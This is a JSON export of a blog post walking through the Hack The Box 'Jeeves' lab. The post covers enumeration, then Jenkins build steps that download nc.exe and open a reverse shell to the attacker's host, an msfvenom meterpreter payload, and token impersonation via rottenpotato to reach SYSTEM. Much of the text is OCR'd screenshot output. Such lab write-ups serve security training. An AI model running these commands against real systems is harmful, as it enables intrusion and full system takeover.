{"id":43,"date":"2021-02-10T10:22:54","date_gmt":"2021-02-10T10:22:54","guid":{"rendered":"https:\/\/areyou1or0.it\/?p=43"},"modified":"2021-02-10T10:23:43","modified_gmt":"2021-02-10T10:23:43","slug":"htb-jeeves","status":"publish","type":"post","link":"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-jeeves\/","title":{"rendered":"HTB &#8211; Jeeves Walkthrough"},"content":{"rendered":"\n<p>nmap<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/0q3H5grzDjW29xJITe46EkfOEhxK0M6p_6wrYGQKVMRhs28vhr5qU6rwTGfpJyuIJqAvoXRcxWTMqV0sSOU7A9yOujTyw3vPfP7IeCJ856ZIwIs-dqPsan4hX3AUPYTm3OdZpyo9\" alt=\"PORT \n80\/tcp \nSTATE SERVICE \nopen http \nVERSION \nMicrosoft IIS httpd 10.0 \nI http-methods: \nSupported methods: OPTIONS TRACE GET HEAD POST \nPotentially risky methods: TRACE \nI http-server-header: Microsoft-IIS\/ 10.0 \nI http-title: Ask Jeeves \n135\/tcp \nopen msrpc \nMicrosoft Windows RPC \nopen microsoft-ds Microsoft Windows 7 \n10 microsoft-ds (workgroup: \n445\/tcp \nWORKGROUP) \n50000\/tcp open http \nJetty 9.4. z-SNAPSHOT \nI http-server-header: Jetty (9.4. z-SNAPSHOT) \nI http-title: Error 404 Not Found \nService Info: Host: JEEVES; OS: Windows; CPE: cpe:\/o:microsoft:windows \nHost script results: \nI smb2-security-mode: \n2.10: \nmessage signing enabled but not required \nI smb2-time: Protocol negotiation failed (SP182) \"\/><\/figure>\n\n\n\n<p>gobuster<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/MLr3D3VXx-DNGzzzmHiqd_qGg63V3dfWavkQqGYirCCfS2MS818Ea7Jhj2Y1lFN2wPxoFzuwIZN2TrotyUtZL_muclsDkrZG3IbL0exJGy5tHzDDnef8ChTst70ZWIApnxipMGq6\" alt=\"root@kali: \/home\/kalisa\/HTB\/jeeves 158x43 \ngobuster -u http:\/\/10.10.10.63:50000\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt \nOJ Reeves (@TheColonial) \nGobuster v2.O.1 \nmode \nUrl\/Domain \nThreads \nWordlist \nStatus codes \nTimeout \n. dir \nhttp:\/\/10.10.10.63:50000\/ \n10 \n\/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium . txt \n, 403 \nIOS \n2019\/07\/07 starting gobuster \n\/askjeeves (Status: 302) \nProgress: 117951 \/ 220561 (53.48%) \"\/><\/figure>\n\n\n\n<p>Jenkins&nbsp;<\/p>\n\n\n\n<p>Code Execution<\/p>\n\n\n\n<p>Create a project on Jenkins<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/tApkNJ73b3l1N1Ovaw9CBba3RJ-Hrs1WZ0tYDQnHcjAYWuDUWxVOtgM82kQQCpzQ06n_TPPhP1CYb7TS1Q9WoJVi7tSOll-PL4VADseKFvHyCmhx6wqjeM4QtQuZqkJv0xc8VeOa\" alt=\"(9 0.10.14.4443 &gt;\/tmp\/f + \nJenkins \nAll \n10.10.10.63:50000\/askjeeves\/view\/all\/newJ0b \nEnter an item name \nkalisa \nRequired field \nFreestyle project \nIll \\ \nThis is the central feature of Jenkins. Jenkins will build your project, combining any SCM with any build system, and this can be even used for \nsomething other than software build. \nPipeline \nOrchestrates long-running activities that can span multiple build slaves. Suitable for building pipelines (formerly known as workflows) and\/or \norganizing complex activities that do not easily fit in free-style jab type. \nMulti-configuration project \nSuitable for prpjects that need a large number of different configurations, such as testing on multiple environments, platform-specific builds, etc. \nFolder \nCreates a container that stores nested items in it. Useful for grouping things together. Unlike view, which is just a filter, a folder creates a \nseparate namespace, so you can have multiple things of the same name as long as they are in different folders. \nGitHub Organization \nScans a GitHub organization (or user account) for all repositories matching some defined markers. \nMultibranch Pipeline \nCreates a set of Pipeline prpjects according to detected branches in one SCM repository. \nOK \"\/><\/figure>\n\n\n\n<p>Low Privileged Shell<\/p>\n\n\n\n<p>Enter commands under Build Section<\/p>\n\n\n\n<p>Powershell wget &#8220;<a href=\"http:\/\/10.10.14.4:8000\/nc.exe\">http:\/\/10.10.14.4:8000\/nc.exe<\/a>&#8221; -outfile &#8220;nc.exe&#8221;<\/p>\n\n\n\n<p>Nc.exe 10.10.14.4 7777 -e cmd.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/FKmeHbV99woVilegQq3q6s3QfC5jF4OGKRPlxz2j7S6d8-XXoR0YnSJ7b4BC1IhtQIM9anadmOxva3rz2vSQYyqKFUazusHe40BJkxfYYD4wXHs871ys1ni75PpPYLfmkYbM7NYn\" alt=\"Build \nExecute Windows batch command \nCommand &quot;http:\/\/10.10.14.13:8000\/nc.exe \nnc.exe 10.10.14.13 7777 -e cmd.exe \nSee the list of available environment variables \nAdd build step \nPost-build Actions \n&quot; -out file \n&quot;nc.exe&quot; \nAdvanced.- \nSave \nApply \"\/><\/figure>\n\n\n\n<p>And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/LphJoJT9q8oamvNqL5LJI7-59iccBFf19fZDBmvYT3l-fJWa1toFpHND101PO-8TUdMQ8QERNKohsRP0iy_MOa29Gns8HV7GWb1kJ8jM2Eod_X8dxwSXGABxZUTvai3FT8HjrDq9\" alt=\"python -m SimpleHTTPServer \nserving HTTP on O.O.O.O port 8000 \n10.10.10.63 \n[07\/Ju1\/2019 &quot;GET \/nc.exe HTTP\/I.I&quot; 200 \nroot@kali: \/home\/kalisa\/HTB\/jeeves 158x26 \nnc -nlvp 7777 \nlistening on [any] 7777 \nconnect to [10.10. 14.13] from (UNKNOWN) [10.10. 10.63] 49677 \nMicrosoft Windows [Version 10.0. 10586] \n(c) 2015 Microsoft Corporation. All rights reserved. \nC : rx . j enkins\\wo \"\/><\/figure>\n\n\n\n<p>Meterpreter Shell<\/p>\n\n\n\n<p>Create a shell with the following command:<\/p>\n\n\n\n<p>msfvenom -p windows\/meterpreter\/reverse_tcp LHOST= LPORT= -f exe &gt; shell.exe<\/p>\n\n\n\n<p>Upload the executable file as shell.exe<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh6.googleusercontent.com\/XZn1iOmaBAPqKm7UYx0qu3Loz0eCfN_RZM3uXjO5pAQ7Oc10G60UVfaws1xJDIkVXIyLgeM8vK2FTUTCXhR8ckdbuZTy_Exh2zf7YEp_woMGc7Z5nSWr4pZxnMJToYn-JkGabjvC\" alt=\"Build \nExecute Windows batch command \nCommand &quot;http:\/\/10.10.14.13:8000\/shell.exe \n&quot; -out file \n&quot;shell.exe&quot; \nAdvanced.- \nSave \nshell.exe \nSee the list of available environment variables \nApply \"\/><\/figure>\n\n\n\n<p>And listen on metasploit<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/0cLIGa1L74NSXUaWGfhJwfEGLZFx1kCV97z7ynQf37DjJfQIK_gahoD4_CFWBZmijog7gN27i1RhBvvHtWlYZ0AGrz0XAYTlb2pV5OgFrMM4pIcF9FUoEDAhkqZ6Zg18sQwnTByA\" alt=\"root@kati : \/home\/katisa\/HTB\/ j eeves# \nmetasploit v5.O.29-dev \nmsfconsole \n1899 exploits \n1068 auxiliary \n547 payloads - 44 encoders \n10 \n2 evasion \n[ Starting persistent handler(s)... \nmsf5 &gt; use exploit\/ multi\/ handler \nmsf5 exploit (multi\/handter) &gt; set payload \n329 \nnops \npost \nwindows\/ meterpreter\/reverse tcp \npayload =&gt; windows\/ meterpreter\/reverse tcp \nmsf5 exploit (multi\/handter) &gt; set LHOST 10.10. 14.13 \nLHOST 10.10. 14.13 \nmsf5 exploit (multi\/handter) &gt; set LPORT 8888 \nLPORT 8888 \nmsf5 exploit (multi\/handter) &gt; run \n[ Started reverse TCP handler on 10.10.14.13:8888 \nsending stage (179779 bytes) to 10.10. 10.63 \nmeterpreter session 1 opened (10.10.14.13:8888 10.10.10.63:49679) at 2019-07-07 \nmeterpreter &gt; \n-0400 \"\/><\/figure>\n\n\n\n<p>Privilege Escalation<\/p>\n\n\n\n<p>I checked with whoami\/priv command and saw that SeImpersonatePrivilege is enabled<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/LYrqppQOqb8ZMTW90ivnERQoRzGlyekpwky2wFTCMZ_gW5ODxl80J4eYh34ITtbQR5ago05jPEQ-6mOZi-LnpcyVrmYUCLfAyAiFh2R7yWqZYKswmqqj-_R4Dodr7mUqS8G-dPvs\" alt=\"whoami \/ priv \nPRIVILEGES INFORMATION \nPrivilege Name \nSeShutdownPrivilege \nSeChangeNotifyPrivilege \nSeUndockPrivilege \nSelmpersonateprivilege \nSecreateGlobalPrivilege \nSelncreaseWorkingSetPrivilege \nSeTimeZonePrivilege \n\/ priv \nDescription \nShut down the system \nBypass traverse checking \nRemove computer from docking station \nImpersonate a client after authentication \nCreate global objects \nIncrease a process working set \nChange the time zone \nState \nDisabled \nEnabled \nDisabled \nEnabled \nEnabled \nDisabled \nDisabled \"\/><\/figure>\n\n\n\n<p>I first loaded incognito with the command <strong>load incognito<\/strong> on meterpreter<\/p>\n\n\n\n<p>list tokens and you&#8217;ll see no token available.<\/p>\n\n\n\n<p>Upload rottenpotato.exe and execute the file&nbsp;<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh3.googleusercontent.com\/izHFWAQOKQQtfCh5gH7D1V-U5VCU7km6pS03DEWkR3Pp77BeRob5A3ffKcDtsfwSk3lAYV7xj2MrYyA3lb90x5DAGWl7X06sQcSHqGqgVF-WWwUQPjbKDfOBzkBrC7wIDGlWr-QL\" alt=\"meter preter &gt; list tokens \n-g \n[-] Warning: Not currently \nrunning as SYSTEM, not all tokens will be available \nCall rev2self \nif primary process token is SYSTEM \nDelegation Tokens Available \nBUILTIN\\Users \nNT AUTHORITY\\Authenticated Users \nNT AUTHORITY\\Loca1 account \nNT AUTHORITY\\LogonSession1d 0 116102 \nNT AUTHORITY\\NTLM Authentication \nNT AUTHORITY\\SERVICE \nNT AUTHORITY\\This organization \nImpersonation Tokens Available \nNo tokens available \nmeter preter &gt; execute \nProcess 3536 created. \nChannel 3 created. \n-f rot. exe \"\/><\/figure>\n\n\n\n<p>list tokens again and you&#8217;ll see administrator token now<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh5.googleusercontent.com\/Fd27pbJ2uQTFxzdPWrDSgyhICdescdj_SM0mJC7zQ7SQWMxcNiYv9P7n_KB6bjODB6hCn1S_XHlBpXRi0lFWxeBo4URdSgVt_vml-Ct9UQPiGZk9e_52R-KEPsrmUaVHhgffgqU1\" alt=\"meter preter &gt; list tokens \n-g \n[-] Warning: Not currently \nrunning as SYSTEM, not all tokens will be available \nCall rev2self \nif primary process token is SYSTEM \nDelegation Tokens Available \nBUILTIN\\Users \nNT AUTHORITY\\Authenticated Users \nNT AUTHORITY\\Loca1 account \nNT AUTHORITY\\LogonSession1d 0 116102 \nNT AUTHORITY\\NTLM Authentication \nNT AUTHORITY\\SERVICE \nNT AUTHORITY\\This organization \nImpersonation Tokens Available \nBUILTIN\\Administrators \nNT AUTHORITY\\LogonSession1d 0 82652 \nNT \nSERVICE\\BITS \nNT \nSERVICE\\DsmSvc \nSERVICE-\\iphlpsvc \nNT \nNT \nSERVICE-Uanmanserver \nSERVICE-Ufsvc \nNT \nSERVICE\\Schedu1e \nNT \nNT \nSERVICE-NSE-NS \nSERVICE\\She11HWDetection \nNT \nSERVICE\\Winmgmt \nNT \nNT \nSERVICE-\\wuauserv \"\/><\/figure>\n\n\n\n<p>Now impersonate the token and become NT AUTHORITY\\SYSTEM<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh4.googleusercontent.com\/TczE9duJlU_1yTKdQrPyo-DveAjkJknnLNzsn_CHtPXAgxoJ4ETpQUBWt19gddFTznZQJyjgz5Sg9pUWN95jPnHgzyCah3OMo_mtvt3NJpGPWRPOL1y8OahZYTih18cTXDkwv1nL\" alt=\"meterpreter &gt; impersonate token &quot;BUILTIN\\Administrators&quot; \n[-] Warning: Not currently running as SYSTEM, not all tokens will be available \nCall rev2self if primary process token is SYSTEM \n[-] No delegation token available \n[+] Successfully impersonated user NT AUTHORITY\\SYSTEPI \nmeter preter &gt; getuid \nserver username: NT AUTHORITY\\SYSTEM \nmeterpreter &gt; \"\/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>nmap gobuster Jenkins&nbsp; Code Execution Create a project on Jenkins Low Privileged Shell Enter commands under Build Section Powershell wget &#8220;http:\/\/10.10.14.4:8000\/nc.exe&#8221; -outfile &#8220;nc.exe&#8221; Nc.exe 10.10.14.4 7777 -e cmd.exe And listened on python SimpleHTTPServer to send the nc.exe file and started to listen on port 7777 with nc for a reverse shell Meterpreter Shell Create a&hellip; <a class=\"more-link\" href=\"https:\/\/areyou1or0.it\/index.php\/2021\/02\/10\/htb-jeeves\/\">Continue reading <span class=\"screen-reader-text\">HTB &#8211; Jeeves Walkthrough<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[17],"tags":[],"_links":{"self":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/43"}],"collection":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/comments?post=43"}],"version-history":[{"count":2,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/43\/revisions"}],"predecessor-version":[{"id":57,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/posts\/43\/revisions\/57"}],"wp:attachment":[{"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/media?parent=43"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/categories?post=43"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/areyou1or0.it\/index.php\/wp-json\/wp\/v2\/tags?post=43"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}